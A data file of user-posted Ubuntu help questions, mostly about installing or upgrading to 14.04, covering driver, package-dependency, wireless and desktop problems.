449473	problem facing on the installation of openfoam in ubuntu 13.04 64 bit	i am facing a problem on installation of openfoam.i am a beginner.i need to learn this for doing a simulation.but the problem is it has become difficult to install openfoam.i have tried by using ubuntu software center . after searching openfoam there comes an installation option.but when i am trying to install it is showing requires installation of untrusted packages and in the details section it is showing binutils-dev blcr-util csh flex g++ g++-4.7 libcr0 libfl-dev libibverbs-dev libibverbs1 libice-dev libopenmpi-dev libopenmpi1.3 libpthread-stubs0 libpthread-stubs0-dev libptscotch-5.1 libptscotch-dev libreadline-dev libreadline6-dev libscotch-5.1 libscotch-dev libsigsegv2 libsm-dev libstdc++6-4.7-dev libtinfo-dev libtorque2 libx11-6 libx11-dev libx11-doc libxau-dev libxcb1 libxcb1-dev libxdmcp-dev libxt-dev libxt6 m4 mpi-default-dev openfoam221 openmpi-bin openmpi-checkpoint openmpi-common x11proto-core-dev x11proto-input-dev x11proto-kb-dev xorg-sgml-doctools xtrans-dev zlib1g-dev then i tried to install by using terminal from this link http : //www.openfoam.org/download/ubuntu.php vers= $ ( lsb_release -cs ) sudo sh -c `` echo deb http : //www.openfoam.org/download/ubuntu $ vers main > /etc/apt/sources.list.d/openfoam.list '' then i entered sudo apt-get update reading package lists ... done then i entered $ sudo apt-get install openfoam230 35 upgraded , 85 newly installed , 0 to remove and 290 not upgraded . need to get 31.7 mb/199 mb of archives . after this operation , 752 mb of additional disk space will be used . do you want to continue [ y/n ] ? then i wrote y warning : the following packages can not be authenticated ! openfoam230 install these packages without verification [ y/n ] ? i wrote y , it shows e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? at this step what should i do ? please suggest me.thanks in advance
449478	change default webapp browser	in its current state , using the ubuntu browser app for webapps sucks . i ca n't copy or paste , it wo n't remember a default size each time i open it , and i get graphical artifacts ( lines , etc . ) on my screen each session . for my purposes , this is virtually unusable . i love the concept of webapps however , but it worked better with firefox . how do i change the default to use either firefox or chromium ?
449479	ubuntu 14.04 lts crashes after login	decided to upgrade to the new lts today , so i backed up my data and created a live usb with unetbootin and wiped my drive clean . install was a little clunky but everything seemed to go just fine . issue is whenever i log in , the desktop loads but either it totally freezes ( mouse not moving , keyboard not functioning ) , or the mouse will still be moveable but nothing lights up when hovered over and clicks do nothing same with keyboard . this happens every time i log in . i rebooted and used the check disc tool and it reports everything is fine . tried reinstalling , same issue . made a second disk with ubuntu 's startup disk creator program , install went smoother that time but same issue on login . i am using a hp dv6000 laptop that worked just fine with 12.04 i am at a loss here , maybe somebody has a little insight , any help would be appreciated , much love for this community
449482	cant start nvidia performance mode	what does this error means ? is not possible to select the nvidia gpu , whenever i try this blank error appears and returns immediately to to intel graphics i just upgraded to kubuntu 14.04 , but before this i did n't use any nvidia drivers . at first when i selected the new driver ( at first i selected the recommended option ) : the system info reported the nvidia was in use , even after restart , but then after opening a wine program , the screen died ( only on that session ) . after some time trying kernel fallback and other things like the system suggested ( sudo apt-get -f install ) i was able to login , but now i cant use nvidia . the gpu is geforce 720m .
449484	why update manager is still showing a development release ?	though ubuntu 14.04 has been officially released , update-manager -d says that the distribution will be upgraded to a development version , still in testing . why ? how long will i have to wait to have the stable in the repos ?
449486	windows installer for ubuntu 14.04 lts onwards	is there any windows installer ( wubi ) for ubuntu 14.04 lts ? when i mount .iso file with daemon tools and run wibu.exe it just ask me if i want to reboot ( i think it 's usefull only when .iso burned on cd ) , so there is no `` real '' intallation ?
449489	broken package problem while installing open source amd ati drivers in 14.04	after purging the fglrx* packages , i tried this - ankit @ ubuntu : ~ $ sudo apt-get install -- reinstall xserver-xorg-core libgl1-mesa-glx : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : amd64 libgl1-mesa-dri : amd64 reading package lists ... done building dependency tree reading state information ... done reinstallation of libgl1-mesa-glx is not possible , it can not be downloaded . reinstallation of libgl1-mesa-glx : i386 is not possible , it can not be downloaded . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgl1-mesa-dri : i386 : depends : libdrm-intel1 : i386 ( > = 2.4.48 ) but it is not going to be installed depends : libdrm-nouveau2 : i386 ( > = 2.4.38 ) but it is not going to be installed depends : libdrm-radeon1 : i386 ( > = 2.4.31 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . any solution around this ?
449492	efficient use of screen real-estate in unity	today i 've just read that part of the reason for the introduction of unity was to provide more efficient use of the display space ... so i thought , i should give it a ( second ) change . however , my screen is rather pessimized : i 'm used to have same useful widgets in place 1 , but it only shows the window title . given the setting 4 , i 'd expect that 2 or 3 will be shown elsewhere ( i guess i just misunderstood it ? ) . given that screens get a more and more `` unsquared '' ( i 'd love a 4:3 monitor ) , i want to waste as few vertical space as possible . is it possible to combine 1 , 2 , and 3 into a single line somehow ? or two ... if not , can i at least get rid of 1 ( i do n't think it 's useful for anything ) ? if not , can i add some widgets there ? any other tips ?
449493	unable to install mesa-common-dev : i386 on my ubuntu system	i am using ubuntu ( 12.04 lts ) x86_64 gnu/linux . i have to setup my build environment on my ubuntu system . while trying to instal the mesa-common-dev : i386 package , i am facing the following error . sudo apt-get install mesa-common-dev : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mesa-common-dev-lts-quantal : conflicts : mesa-common-dev : i386 e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . please suggest ways to get rid of this .
449496	how to set discharging preference of batteries in lenovo thinkpad r400 in ubuntu ?	i have lenovo thinkpad r400 . i have standard battery and second battery in ultrabay slot . i want to set preference so standard battery discharges first and then starts discharging the second ultrabay battery . is this possible and how ? thanks for any hints in advance .
449497	black screen after update : applications ca n't access your google account	i updated from 13.04 to 14.04 . after the reset , appeared the ubuntu logo , but then the screen went black . a pop up appeared in the right top corner : applications ca n't access your google account . then it disappears . the mouse does n't work . what can i do ?
449499	i really wan na use ubuntu on my dell venue 8 pro	i am using dell venue 8 pro . but i think windows8.1 it is not that good on tablet . it is just allowed touch input system . but i think ubuntu is working well on tablet . so i searched a lot in google but i just saw a person just booted ubuntu on tablet but he just used mouse and keyboard . he did n't touch the screen . and i saw an aticle about porting ubuntu on dell venue 8 pro but the user can access internet . there are so many error like drive and something . shortly i just wan na know , is it okay to use ubuntu on dell venue 8 pro ? if it is possible , could you tell me how to boot it ? i will appreciate him or her . thank you for reading
449504	it is possible to set multiple passwords to single login in ubuntu platform ?	i tried with different ways , but not worked at all . please any-one help me ? i 've looked at this question : set 2 passwords for one user ? the referenced duplicate is not the same question . the referenced question is about how to use one password for normal usage and one for sudo . this question question can imply that a person has 20 passwords ( none of which needs to be sudo )
449507	nvidia-libopencl1-331 has to be removed before installing wine	i just installed ubuntu 14.04 64-bit and enabled the nvidia drivers . now i am trying to install wine but i get the message : nvidia-libopencl1-331 has to be removed before installing wine ( translated from dutch ) . is this a bug ? or should i proceed removing this package ?
449508	steam is extremely slow to load the first game	it takes almost 4 minutes to start a game ( dota2 ) and another 3 to start a match after accepting a match . this always happens only on my first match . the subsequent matches load relatively quickly , but when i quit the game . my entire system is slowed down for some reason and it stays this way till i restart the computer . my computer configuration is enough to play the game at basic graphics .
449511	folders not showing up in 'recent ' view in 14.04	if i open up what is now called files , and click on 'recent ' in the left hand column , it gives me all the files i 've used recently well enough , but none of the folders . folders are how i keep everything organised and browse the system . is there any way to get them to show up ?
449518	has anyone installed ubuntu on sony vaio vpccw16fg ? ( cw 1 series )	1 ) please give your reviews ( for those who have install it ) 2 ) cant seem to find anything regarding ubuntu for sony vaio vpccw16fg on the web ( succesful installations etc ) 3 ) in reference to number ( 2 ) , is it compatible with my model ? and if it is , can i have the `` clean install instructions '' for my model ( vpccw16fg ) ? 4 ) having problems with my current os ( win 7 home premium 64bit ) pre installed from sony and i would love to delete/uninstall win 7 because it is giving me a lot of headaches ie bsod.. thanks !
449521	mouse pointer is not visible on a fresh installation of 14.04	yesterday i installed 14.04 on my dell latitude e6430 . after the instalation when system started mouse pointer is not visible and the touchpad and mouse are , hence , useless . how do i resolve this ?
449524	what would happen if my internet connection is lost while i am upgrading from 12.04lts to 14.04lts ?	i want to upgrade my os from 12.04 to 14.04 . i found how to get it . but i 've one more question . what would happen if i gave the command to upgrade , it starts but after downloading some or many file my internet connection is lost ? an i still be able to use 12.04 ? and what about downloaded files of 14.04 . they would still be on pc or i have to download them from the beginning ?
449530	switching between nvidia geforce 640m and intel integrated graphics	hello i 'm new to ubuntu and all in linux . i have a computer with 8 gb of ram and a processor intel core i7 3770s and video card nvidia geforce 640m and and intel integrated graphics . in my system information is displayed only integrated graphics intel . how do i switch to the nvidia geforce 640m ( in the bios do not have this function ) ? sorry for the grammatical errors , i do not know much english . ubuntu 14.04
449533	am i using beta or stable ?	i have been doing so many sudo apt-get update/ ( dist- ) upgrade since yesterday and something happend - so that i am confused now whether i am using still beta or the stable version . how do i figure that out ?
449534	could not access desktop after upgrading to 14.04	i have upgraded my system from ubuntu 13.10 to 14.04.but then i ca n't access my desktop , only mouse pointer is visible no unity bar . then i restarted the computer and log in as guest . it is worked . what happened to my system ? how can i access my desktop ? pls help
449538	backspace behaves oddly in text editors with screen	i have no idea why but backspace sends ^ ? to my text editor ( nano , vim , emac , sublime , does n't matter which one ) when i run them inside of screen but not otherwise . any ideas as to why this is and how it can be resolved ?
449539	upgrade 12.04 to 14.04	i want to upgrade my 12.04lts to 14.04lts . i have tried update-manager-d , and in update manager settings i have set something like : `` notify when new lts version ... '' . but i don`t get message that new ubuntu is available . update manager shows that no , updates available .
449540	can`t install ubuntu 14.04 , it keeps restarting	i am unable to install ubuntu . as soon as i enter the installation process and click the `` next '' button for installing it just reboots as if the flash drive has stopped working suddenly . this happens to me every time .
449541	upgrade aborted mid-process and i 've lost gnome-control-center	i upgraded my ubuntu gnome 13.10 installation today by using : do-release-upgrade in the terminal . when i came back it was on a tty ( at least i think it was a tty ) ! then as i could n't go back to the desktop by using alt+f7 i rebooted . gnome-shell came up , but could n't move the mouse ! i dropped back to alt+f2 and run : sudo apt-get update and sudo apt-get dist-upgrade . it downloaded a bunch of stuff and manually installed gnome-shell again . now my installation is working fine , except i do n't have the gnome control panel , trying to install it shows me this : ~ $ sudo apt-get install gnome-control-center [ sudo ] password for : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-control-center : depends : gnome-control-center-data ( < 1:3.7 ) but 1:3.10.1-0ubuntu1~saucy3 is to be installed recommends : gnome-control-center-shared-data but it is not going to be installed e : unable to correct problems , you have held broken packages . laptop : ~ $ sudo apt-get install -f‍‍‍ reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : blt guile-1.8 guile-1.8-libs libamd2.2.0 libaqhbci20 libavfilter2 libboost-iostreams1.53.0 libboost-serialization1.53.0 libfftw3-3 libllvm3.3 : i386 libmjpegutils-2.0-0 libmng1 libmpeg2encpp-2.0-0 libmplex2-2.0-0 libtcl8.5 libtk8.5 libumfpack5.4.0 libwebp4 libx264-123 mono-gmcs python-central python-support slib tcl8.5 tk8.5 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . what can i do to fix this ? i 'm also worried that i have a potentially unstable system . can i run do-release-upgrade again somehow ? when i tried it , it , obviously , said i was up to date . can i upgrade my installation via the iso ? ( my installations is fully encrypted ( luks/lvm ) , remember that there was a bug/behaviour which did n't support upgrades through iso when encrypted ) i 'd really like to avoid doing a fresh installation , i have a backup with deja dup , but re-installing my applications , and setting up system stuff is annoying and really time consuming for me .
449542	wireless connection error for some networks	i have just installed ubuntu 14.04 lts and everything about wireless was ok until i come to work . 14.04 recognized & successfully connected to my home wireless network but it does not connect to my work wireless network . i 'm able to see my work wireless network but always get connection error . here is the related syslog : apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) starting connection 'wifi-aibu' apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0/wireless ) : connection 'wifi-aibu ' requires no security . no secrets needed . apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > config : added 'ssid ' value 'wifi-aibu' apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > config : added 'scan_ssid ' value '1' apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > config : added 'key_mgmt ' value 'none' apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > config : set interface ap_scan to 1 apr 18 11:36:57 talha-hp networkmanager [ 741 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning apr 18 11:36:57 talha-hp wpa_supplicant [ 755 ] : message repeated 5 times : [ wlan0 : ctrl-event-scan-started ] apr 18 11:36:58 talha-hp wpa_supplicant [ 755 ] : wlan0 : trying to associate with 3c:94 : d5:3e:10:82 ( ssid='wifi-aibu ' freq=2462 mhz ) apr 18 11:36:58 talha-hp networkmanager [ 741 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > associating apr 18 11:36:59 talha-hp wpa_supplicant [ 755 ] : wlan0 : associated with 3c:94 : d5:3e:10:82 apr 18 11:36:59 talha-hp wpa_supplicant [ 755 ] : wlan0 : ctrl-event-connected - connection to 3c:94 : d5:3e:10:82 completed [ id=0 id_str= ] apr 18 11:36:59 talha-hp kernel : [ 1273.444046 ] cfg80211 : calling crda for country : tr apr 18 11:36:59 talha-hp networkmanager [ 741 ] : < info > ( wlan0 ) : supplicant interface state : associating - > completed apr 18 11:36:59 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'wifi-aibu ' . apr 18 11:36:59 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . apr 18 11:36:59 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... apr 18 11:36:59 talha-hp networkmanager [ 741 ] : < info > ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] apr 18 11:36:59 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) apr 18 11:36:59 talha-hp networkmanager [ 741 ] : < info > dhclient started with pid 3072 apr 18 11:36:59 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . apr 18 11:36:59 talha-hp kernel : [ 1273.450186 ] cfg80211 : regulatory domain changed to country : tr apr 18 11:36:59 talha-hp kernel : [ 1273.450191 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) apr 18 11:36:59 talha-hp kernel : [ 1273.450194 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) apr 18 11:36:59 talha-hp kernel : [ 1273.450196 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 20000 khz ) , ( n/a , 2000 mbm ) apr 18 11:36:59 talha-hp kernel : [ 1273.450198 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 20000 khz ) , ( n/a , 2000 mbm ) apr 18 11:36:59 talha-hp kernel : [ 1273.450201 ] cfg80211 : ( 57240000 khz - 65880000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) apr 18 11:36:59 talha-hp avahi-daemon [ 722 ] : withdrawing address record for fe80 : :6627:37ff : fe56 : afb9 on wlan0 . apr 18 11:36:59 talha-hp avahi-daemon [ 722 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :6627:37ff : fe56 : afb9 . apr 18 11:36:59 talha-hp avahi-daemon [ 722 ] : interface wlan0.ipv6 no longer relevant for mdns . apr 18 11:36:59 talha-hp dhclient : internet systems consortium dhcp client 4.2.4 apr 18 11:36:59 talha-hp dhclient : copyright 2004-2012 internet systems consortium . apr 18 11:36:59 talha-hp dhclient : all rights reserved . apr 18 11:36:59 talha-hp dhclient : for info , please visit https : //www.isc.org/software/dhcp/ apr 18 11:36:59 talha-hp dhclient : apr 18 11:36:59 talha-hp networkmanager [ 741 ] : < info > ( wlan0 ) : dhcpv4 state changed nbi - > preinit apr 18 11:36:59 talha-hp dhclient : listening on lpf/wlan0/64:27:37:56 : af : b9 apr 18 11:36:59 talha-hp dhclient : sending on lpf/wlan0/64:27:37:56 : af : b9 apr 18 11:36:59 talha-hp dhclient : sending on socket/fallback apr 18 11:36:59 talha-hp dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 3 ( xid=0x8c5113b ) apr 18 11:37:00 talha-hp avahi-daemon [ 722 ] : joining mdns multicast group on interface wlan0.ipv6 with address fe80 : :6627:37ff : fe56 : afb9 . apr 18 11:37:00 talha-hp avahi-daemon [ 722 ] : new relevant interface wlan0.ipv6 for mdns . apr 18 11:37:00 talha-hp avahi-daemon [ 722 ] : registering new address record for fe80 : :6627:37ff : fe56 : afb9 on wlan0.* . apr 18 11:37:02 talha-hp dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 8 ( xid=0x8c5113b ) apr 18 11:37:10 talha-hp dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 14 ( xid=0x8c5113b ) apr 18 11:37:24 talha-hp dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 16 ( xid=0x8c5113b ) apr 18 11:37:40 talha-hp dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 18 ( xid=0x8c5113b ) apr 18 11:37:44 talha-hp networkmanager [ 741 ] : < warn > ( wlan0 ) : dhcpv4 request timed out . apr 18 11:37:44 talha-hp networkmanager [ 741 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 3072 apr 18 11:37:44 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... apr 18 11:37:44 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... apr 18 11:37:44 talha-hp networkmanager [ 741 ] : < info > ( wlan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] apr 18 11:37:44 talha-hp networkmanager [ 741 ] : < info > marking connection 'wifi-aibu ' invalid . apr 18 11:37:44 talha-hp networkmanager [ 741 ] : < warn > activation ( wlan0 ) failed for connection 'wifi-aibu' apr 18 11:37:44 talha-hp networkmanager [ 741 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . apr 18 11:37:44 talha-hp networkmanager [ 741 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] apr 18 11:37:44 talha-hp networkmanager [ 741 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] apr 18 11:37:44 talha-hp avahi-daemon [ 722 ] : withdrawing address record for fe80 : :6627:37ff : fe56 : afb9 on wlan0 . apr 18 11:37:44 talha-hp avahi-daemon [ 722 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :6627:37ff : fe56 : afb9 . apr 18 11:37:44 talha-hp avahi-daemon [ 722 ] : interface wlan0.ipv6 no longer relevant for mdns . apr 18 11:37:44 talha-hp wpa_supplicant [ 755 ] : wlan0 : ctrl-event-disconnected bssid=3c:94 : d5:3e:10:82 reason=3 locally_generated=1 apr 18 11:37:44 talha-hp wpa_supplicant [ 755 ] : nl80211 : was expecting local disconnect but got another disconnect event first p.s . additional information it successfully connects to my mobile phone 's wifi too . i was able to connect same network yesterday using ubuntu 12.04 . edit : output of lspci -nnk | grep -ia2 net 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:1795 ] kernel driver in use : wl 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : hewlett-packard company device [ 103c:1670 ] kernel driver in use : r8169
449543	what does the symbol % in ' % sudo all= ( all : all ) all ' mean ?	what does the symbol % in the following statement mean : # allow members of group sudo to execute any command % sudo all= ( all : all ) all is it the same to write as : sudo all= ( all : all ) all
449546	ubuntu 13.10 to 14.04 lts does not upgrade , keeps showing error	the update from ubuntu 13.10 to 14.04 lts does not work it keeps showing me an error as could not calculate the upgrade , even when i want it to get updated from the terminal it says the same error . i did not use the beta its the final ubuntu 14.04 lts.i have restarted my laptop for like 5-10 times no change . disabling the software sources also does not help .
449551	synergy works one way only ?	i am running two ubuntu 12.04 machines connected to the university network . one is a desktop and the other a x230t lenovo laptop . they are both wired ( eth0 ) to the same network . i am trying to get synergy to work in order to share the desktop 's mouse and keyboard to the laptop . i am a bit of a beginner in networking in linux . i have tried pinging between computers and for whatever reason only the desktop computer can ping into the laptop , but the laptop can not ping to the desktop . thus i can share the laptop 's keyboard and mouse with the desktop but not the other way around . what is going on ? is n't ping a two way test ? i have tried sudo ufw disable on both machines and no luck . i have googled around but none seems to be having problems exclusively between linux machines . any clues about where/how to find out more highly appreciated . thanks a lot ! common diagnostic commands : desktop : ifconfig eth0 link encap : ethernet hwaddr 00:1a : a0:06 : b5 : f7 inet adr:192.168.16.194 bcast:192.168.16.255 masque:255.255.255.0 adr inet6 : fe80 : :21a : a0ff : fe06 : b5f7/64 scope : lien up broadcast running multicast mtu:1500 metric:1 packets reçus:196073 erreurs:0 :0 overruns:0 frame:0 tx packets:130530 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 octets reçus:224801329 ( 224.8 mb ) octets transmis:16197933 ( 16.1 mb ) interruption:17 lo link encap : boucle locale inet adr:127.0.0.1 masque:255.0.0.0 adr inet6 : : :1/128 scope : hôte up loopback running mtu:65536 metric:1 packets reçus:4269 erreurs:0 :0 overruns:0 frame:0 tx packets:4269 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:0 octets reçus:888470 ( 888.4 kb ) octets transmis:888470 ( 888.4 kb ) ip route default via 192.168.16.254 dev eth0 proto static 169.254.0.0/16 dev eth0 scope link metric 1000 192.168.16.0/24 dev eth0 proto kernel scope link src 192.168.16.194 metric 1 laptop : ifconfig eth0 link encap : ethernet hwaddr 3c:97:0e:18:91:6e inet addr:193.50.41.173 bcast:193.50.41.255 mask:255.255.255.0 inet6 addr : fe80 : :3e97 : eff : fe18:916e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:24839 errors:19 dropped:0 overruns:0 frame:10 tx packets:4413 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8312539 ( 8.3 mb ) tx bytes:566285 ( 566.2 kb ) interrupt:20 memory : f2500000-f2520000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:544 errors:0 dropped:0 overruns:0 frame:0 tx packets:544 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:51448 ( 51.4 kb ) tx bytes:51448 ( 51.4 kb ) wlan0 link encap : ethernet hwaddr 60:67:20:1f:8b : f0 inet6 addr : fe80 : :6267:20ff : fe1f:8bf0/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:22 errors:0 dropped:0 overruns:0 frame:0 tx packets:165 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:6189 ( 6.1 kb ) tx bytes:32248 ( 32.2 kb ) ip route default via 193.50.41.254 dev eth0 proto static 169.254.0.0/16 dev eth0 scope link metric 1000 193.50.41.0/24 dev eth0 proto kernel scope link src 193.50.41.173 metric 1 best regards !
449552	how to install openssh-server , tcsh , autofs and ypbind on ubuntu 14.04 desktop version ?	how to install openssh-server , tcsh , autofs and ypbind on ubuntu 14.04 desktop version ? i 'd like to modify the source.list to use apt-get for similar packages . they are all in trusty/main or trusty/universe ... thanks a lot .
449555	how to install python 3.4 on ubuntu ?	if i open terminal and type in python , i see the version is 2.7.4 . how do i get python 3.4 ? and do i need idle if i have sublime text ?
449556	jitsi wo n't start under ubuntu	i installed jitsi , both from the official repos and a direct download from the webpage . when i try to run it i get the error message : sip communicator is already running and will handle your parameters ( if any ) launch with the -- multiple param to override this behaviour . if i do launch it with -- multiple java gives a huge error message and it crashes .
449557	how do i get mint menu in my gnome flashback panel in ubuntu 14.04 ?	i tried installing the mint menu package following these instructions . however , when i get to the step of actually installing , i get these errors : $ sudo apt-get install mintmenu reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : mintmenu : depends : python-mate-menu but it is not installable depends : libmatepanelapplet but it is not installable depends : mate-menus but it is not installable depends : gir1.2-mate-panel but it is not installable depends : mozo but it is not installable e : unable to correct problems , you have held broken packages . from what i see on the web , it seems like it should be possible to install mint menu , but maybe i 've been misled . can i get mint menu to appear on my gnome panel in gnome flashback ? if not , is there an alternative menu that approximates the look , feel , and functionality of the mint menu that will work on my system ?
449562	virtualbox drag'n'drop is n't working unlike other virtualbox guest additions features	lubuntu 13.10 is guest os , windows 7 is host . i installed guest additions from the virtualbox menu ( devices > install guest additions ) . shared folders , shared clipboard work perfectly , seamless mode works except some wallpaper glitches but drag'n'drop is not working in any direction , in any mode ( host to guest , guest to host , bidirectional ) .
449563	why am i getting these error messages when i try to view media files on my android device ?	( note : this question originally expressed two problems . after creating the bounty , i figured some things out , so i 've narrowed it down to just one problem . ) i have just made a fresh install of ubuntu 14.04 . when i plug in my android phone by usb , i can access the files on the phone , though not smoothly . image and sound files wo n't open unless i copy them to the computer first . banshee crashes if the android is connected . this is the error if i try to open an image file : '' failed to open input stream for file '' why am i getting this error and how do i get my android to connect without problems ? note , i have tried switching from mtp to ptp mode , and when i do , i ca n't seem to acess files on the phone at all . i have installed mtp-tools . i can connect by usb mass storage , and then i can view image files and use banshee . the downside there is that it takes half a dozen screens and selections on the android device to enable usb mass storage mode each time i connect , and i 'm looking for plug and play functionality . also note , i am agnostic about solutions in that i do n't care if it means using mtp , ptp , or usb mass storage . i want to be able to use my android device seemlessly , just plug it in and use , and i 'm not bothered about how that happens . the android device is a samsung galaxy s2 , running android 4.1.2 .
449568	broken gnome-keyring file and google-chrome hangs	after few weeks of uptime yesterday i rebooted my laptop . after that - i discovered that there is no password in gnome-keyring . gnome-keyring segfault and did n't work . i restored ~/.gnome2/keyrings/login.keyring from backup from last week , but - it did n't help . gnome-keyring still segfault . in desperation - i restored version from few months ago . it helps - gnome-keyring start working correct , but - there are n't my recent passwords . it 's not a very big problem , most of passwords are up-to-date , but - there is another issue . when i start google-chrome - it starts , then gnome-keyring-daemon start working with 100 % cpu usage , and after few minuts - gnome-keyring slows , but google-chrome hangs - did n't respond to mouse and keybord . killall chrome helps ; ) i have read passwords from my last backup of login.keyring by simple python script and i can use it in another browser - but it 's not a usefull solution . does anybody have any idea how to : - recover recent passwords from .keyring file which hangs gnome-keyring-daemon - fix connection between gnome-keyring and google chrome ?
449570	stream music to shareport	i have a vsx-527 av-receiver supporting airplay and dlna streamingg and a raspberrypi with shareport installed , i would like to stream my music from ubuntu 12.04 lts to one of this devices . how do i do this ? i tried pulseaudio-module-raop and checked the settings . i found both devices in the list , but the sound wont seem to stream . i would also install an other music player supporting this function , but untill now i did n't found one . greetings kaito
449571	dependency is not satisfiable : libtiff4 when trying to install lightworks on ubuntu 14.04	i was trying to install lightworks 11.5.1 ( amd64 ) on ubuntu 14.04 ( amd64 ) but there 's a notice : dependency is not satisfiable : libtiff4 . is there anyway to solve this dependency issue ? thanks in advance .
449574	`` intel_rapl : no valid rapl domains '' message upon boot	i install fresh ubuntu 14 . 04 server under esxi 5.1.0 . during my installation i did not get any erorrs or strange things . my problem is when i boot machine at console screen i get messages like [ 6.958104 ] intel_rapl : no valid rapl domains found in package 0 [ 7.508153 ] intel_rapl : no valid rapl domains found in package 0 [ 8.058695 ] intel_rapl : no valid rapl domains found in package 0 [ 8.609932 ] intel_rapl : no valid rapl domains found in package 0 [ 9.163260 ] intel_rapl : no valid rapl domains found in package 0 after that messages i am able to log in and my to me ubuntu works ok . i have internet connection i am able to call apt-get update and i am able to login over ssh . should i investigate these errors deeply before i continue build my server . do i need to react on these messages or it is ok to run ubuntu like this .
